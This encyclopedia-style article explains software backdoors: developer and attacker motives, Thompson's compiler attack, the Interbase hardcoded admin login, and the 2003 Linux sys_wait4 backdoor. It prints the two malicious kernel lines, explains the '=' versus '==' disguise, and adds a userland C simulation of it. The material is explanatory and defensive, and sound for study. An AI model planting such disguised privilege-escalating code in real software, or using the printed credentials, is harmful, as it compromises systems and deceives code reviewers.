Backdoor

In software, a backdoor (literally a "door at the back", also called a hidden door) is a feature unknown to the legitimate user that gives secret access to the software. In computer security, a backdoor can be regarded as a type of Trojan horse.

Technique

A backdoor can be introduced either by the developer of the software or by a third party, typically a hacker. Someone who knows of the backdoor can use it to monitor the software's activity, or even to take control of it (by bypassing authentication). Finally, depending on the extent of the rights the operating system grants to the software containing the backdoor, that control can extend to all the operations of the computer.

The widespread networking of computers makes backdoors far more useful than in the days when physical access to the computer was the rule.

Among the motivations that lead software developers to create backdoors are:

  1. the practical benefit of easy, always-open access to the software, so that maintenance can be carried out efficiently.
  2. the ability to disable the software surreptitiously in the event of a dispute with the customer (non-payment of a license).

Among the motivations that lead hackers to install a backdoor:

  1. the ability to monitor what the legitimate user does and to copy or destroy valuable data (passwords, private keys for decrypting private messages, banking details, trade secrets).
  2. the ability to take control of a computer and use it for malicious actions (sending spam, notably for phishing, spreading computer viruses, denial of service).
  3. control of a vast network of computers (see Botnet), which can be used for extortion through distributed denial of service (DDoS), or resold to criminals.

To install backdoors en masse, hackers use worms. These spread automatically and install a server on each infected computer. The attacker can then connect to that server over the Internet.

A backdoor can also be inserted by way of an Easter egg or a compiler (see the section below, The case of the Unix C compiler: Trusting Trust), or can take the form of a program, such as Back Orifice.

The case of the Unix C compiler: Trusting Trust

In 1984, the American computer scientist Kenneth Thompson described, in his article Reflections on Trusting Trust, how it would have been possible to insert a backdoor into all C programs compiled on Unix. Moreover, since updated versions of this compiler, which is itself nothing more than another compiled program, are compiled with the pre-existing C compiler, the backdoor-insertion algorithm would have been passed on from one update to the next. Therefore, if this backdoored compiler had been "released in the wild" at the outset, any C compiler could possibly be inserting backdoors today.

  • A notable characteristic of this fictitious compiler is that the backdoor present in every compiled C program never appears in the C source code.

  • The name trust comes from the fact that the original C compiler is regarded by its end user as a black box worthy of trust.

  • Consider a programmer who does not understand how such a compiler works but trusts it. It would be difficult for him to detect that a program he wrote himself and then compiled contains a backdoor.

Source: Kenneth Thompson, Reflections on Trusting Trust, Communications of the ACM, vol. 27, no. 8, August 1984, pp. 761-763.

Notable cases

Interbase

A backdoor was discovered in the Interbase DBMS on January 10, 2001, when its publisher, Borland, opened the source code. Entering the user name "politically" and the password "correct" was enough to log in as an administrator. The flaw had existed since 1994.

Linux

In November 2003, a backdoor was found in Linux. Very fortunately, it was detected quickly, before a version of Linux was put into production. The backdoor was grafted on very concisely: it consists of two lines of C added to the function sys_wait4 in the file "kernel/exit.c":

    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
            retval = -EINVAL;

The condition (current->uid = 0) is meant to be read by a particularly naive reader as the comparison "if the process's user ID is 0 (root)", but in C it actually means the assignment "the process's user ID becomes 0 (root)". As a result, if this doctored sys_wait4() function was called with the parameters __WCLONE|__WALL, the process took on the identity of root, the superuser, and thus had maximum access rights.

In reality, that is not exactly what the two inserted lines achieve, because Linux uses several flags, the capabilities, rather than the user ID, to decide whether a process may override an access-control rule. The process would in fact have had no specific rights beyond those of user ID 0 (root): manipulating files belonging to root, processes belonging to root, and so on, which is very significant as a security breach but has nothing to do with the concept of superuser.

This supposedly subtle modification was meant to be read by a hypothetical novice C programmer trained in programming languages where the equality test is written = (Pascal, Ada, ML…) rather than == (C, C++, Java…). It goes without saying that a programmer at that beginner level does not work (or should never work) on the Linux kernel sources. In fact, since C is the most widely used programming language on Unix-family systems, very few non-beginner users (including those not working on the kernel) would have been taken in.

Moreover, the collective development process of software (free software in particular) requires that every modification be validated, for which it must have a legitimate justification. Thus any modification, however small, will appear in the diff and will raise legitimate questions if it has no clear justification.
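
The effect of the two lines inserted into sys_wait4, reproduced as an added example that is not part of the original article or of the kernel source: a userland C simulation in which struct task, the check_* functions and uid_after are hypothetical stand-ins and the flag values are constructed. It shows that the assignment evaluates to 0, so retval is never set and the only effect of the inserted lines is the change of uid.

```c
#include <stdio.h>
#include <errno.h>

/* Userland stand-ins for kernel definitions; values are constructed for this example. */
#undef __WCLONE
#undef __WALL
#define __WCLONE 0x80000000u
#define __WALL   0x40000000u

struct task { unsigned int uid; };   /* hypothetical stand-in for the kernel's task struct */

/* The check as inserted in 2003: '=' assigns 0 to uid, and the expression's value is 0. */
static int check_backdoored(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
        retval = -EINVAL;            /* never reached: the condition is always false */
    return retval;
}

/* What the line pretends to be: '==' only compares and leaves uid untouched. */
static int check_comparison(struct task *current, unsigned int options)
{
    int retval = 0;
    if ((options == (__WCLONE|__WALL)) && (current->uid == 0))
        retval = -EINVAL;
    return retval;
}

/* Run one check as an unprivileged task (uid 1000) and report the uid afterwards. */
static unsigned int uid_after(int (*check)(struct task *, unsigned int),
                              unsigned int options, int *retval)
{
    struct task t = { .uid = 1000 };
    *retval = check(&t, options);
    return t.uid;
}

int main(void)
{
    int rv;
    unsigned int uid = uid_after(check_backdoored, __WCLONE|__WALL, &rv);
    printf("backdoored, trigger flags: uid=%u retval=%d\n", uid, rv);
    uid = uid_after(check_backdoored, __WALL, &rv);
    printf("backdoored, other flags:   uid=%u retval=%d\n", uid, rv);
    uid = uid_after(check_comparison, __WCLONE|__WALL, &rv);
    printf("comparison, trigger flags: uid=%u retval=%d\n", uid, rv);
    return 0;
}
```

Because the call returns no error and changes nothing else, a review of the diff is the practical place to catch such a change: an assignment inside a condition that also touches a credential field has no legitimate justification here.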

In film

  • The plot of the American film WarGames rests on a backdoor. The designer of a military computer system inserts a backdoor in the form of an undocumented password that gives access to it. This password also gives access to undocumented features of the program, which make the weapons control system look like a war-simulation video game.

External links

  • Article on transfert.net about the backdoor in Interbase

  • Article on kerneltrap.org about the backdoor in Linux
